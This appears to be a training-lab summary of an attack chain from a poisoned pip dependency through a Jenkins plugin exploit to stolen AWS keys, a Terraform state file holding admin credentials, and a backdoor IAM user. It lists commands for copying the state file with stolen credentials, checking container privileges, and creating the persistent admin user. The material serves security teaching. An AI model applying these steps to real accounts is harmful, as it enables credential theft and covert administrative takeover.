x

Attacking AWS Cloud Infra

This module details a practical attack scenario demonstrating how to exploit vulnerabilities and misconfigurations within a Continuous Integration/Continuous Delivery (CI/CD) pipeline involving Jenkins and AWS. The goal is to escalate privileges from a vulnerable Jenkins instance to full administrative control over an AWS account, including establishing persistence.

1. Attack Scenario Overview

The module outlines an attack chain that progresses from leaked secrets to a poisoned pipeline, ultimately compromising an AWS environment. The scenario involves:
1. Initial Information Gathering: Discovering Jenkins and associated code repositories.
2. Dependency Chain Attack: Crafting a malicious package to be downloaded by a builder, allowing arbitrary code execution in a production environment.
3. Compromising the Environment: Scanning the network, discovering more services, and tunneling into the automation server (Jenkins).
4. Exploiting Jenkins: Creating an account, exploiting a plugin vulnerability to obtain AWS keys.
5. AWS Key Exploitation: Utilizing stolen AWS keys to access an S3 bucket containing a Terraform state file, which holds administrative AWS keys.
6. Persistence: Creating a backdoor account for long-term access.

2. Key Techniques & Concepts

  • Information Gathering:

    • Jenkins Enumeration: Identifying Jenkins instances and inspecting their configurations, jobs, and connected repositories (e.g., Git, CloudFormation templates).
    • S3 Bucket Exploration: Discovering and analyzing S3 buckets, especially those serving web applications or storing sensitive files like terraform.tfstate.
    • Source Code Review: Examining Jenkinsfile and other configuration files in repositories for exposed credentials or vulnerable pipeline logic.

  • Dependency Chain Attack / Poisoned Pipeline:

    • Exploiting package manager configurations (e.g., pip.conf) to redirect package downloads to a malicious internal server, leading to code execution within the build environment.

  • Compromising Jenkins:

    • Exploiting Jenkins plugin vulnerabilities to gain initial access or escalate privileges within the Jenkins server.
    • Checking Docker container privileges within Jenkins agents (cat /proc/1/status | grep Cap) to determine if the container runs in a privileged mode, granting extensive control over the host.

  • AWS Key Extraction & Exploitation:

    • Finding AWS API keys embedded directly in application source code (e.g., JavaScript files of an S3 explorer application).
    • Using extracted AWS keys to perform authenticated AWS CLI actions.
    • Accessing sensitive S3 buckets containing infrastructure-as-code state files (e.g., Terraform state files) that often contain hardcoded administrator credentials.

  • Privilege Escalation & Persistence:

    • Leveraging administrator keys found in Terraform state files to create new IAM users with administrative access (AdministratorAccess policy).
    • This backdoor user ensures continued access even if original compromised credentials are revoked.

3. Tools & Commands

  • **nmcli**: Used for network connection management, including listing active connections.

    • nmcli connection modify "Wired connection 1" ipv4.dns "": Reset DNS settings.
    • sudo systemctl restart NetworkManager: Restart NetworkManager service.

  • **aws configure**: Configures AWS CLI credentials and default region.

    • aws configure --profile=<profile-name>: Configure a named profile.
    • Example: aws configure --profile=backdoor.

  • **aws s3 ls**: Lists contents of an S3 bucket.

    • aws s3 ls staticcontent-lgudbhv8syu2tgbk: List specific bucket contents.
    • aws --profile=stolen-s3 s3 ls tf-state-9b58rezp3vvkf90f: List bucket contents using a specific profile.

  • **aws s3 cp**: Copies files to/from S3 buckets.

    • aws --profile=stolen-s3 s3 cp s3://tf-state-9b58rezp3vvkf90f/terraform.tfstate ./: Copy a Terraform state file to the local directory.

  • **cat** & **grep**: Used for viewing file contents and searching for strings.

    • cat /proc/1/status | grep Cap: Check container capabilities (privileged status).
    • cat -n terraform.tfstate: View contents of a Terraform state file with line numbers.
    • cat -n ~/.config/pip/pip.conf: View pip configuration file.

  • **mkdir -p**: Creates directories, including parent directories if they don't exist.

  • **nano**: Text editor for creating/editing files (e.g., pip.conf).

  • **rm**: Removes files.

    • rm ~/.pypirc: Remove pip related configuration file.
    • rm ~/.config/pip/pip.conf: Remove pip configuration file.

  • **aws iam create-user**: Creates a new IAM user.

  • **aws iam attach-user-policy**: Attaches an IAM policy to a user.

    • aws --profile backdoor iam list-attached-user-policies --user-name backdoor: List policies attached to a user.

  • Proxy Tools: (Implied, for tunneling into automation servers)

    • SOCKS proxy in Firefox (needs to be configured and later reverted).

4. Cleanup & Reversion

  • DNS Settings: If modified (e.g., using nmcli), revert DNS settings to ensure normal network operation.
  • Pip Configuration Files: Remove created ~/.pypirc and ~/.config/pip/pip.conf files to restore default pip behavior.
  • Browser Proxy Settings: Disable any SOCKS proxies configured in web browsers.
Left-click: follow link, Right-click: select node, Scroll: zoom
x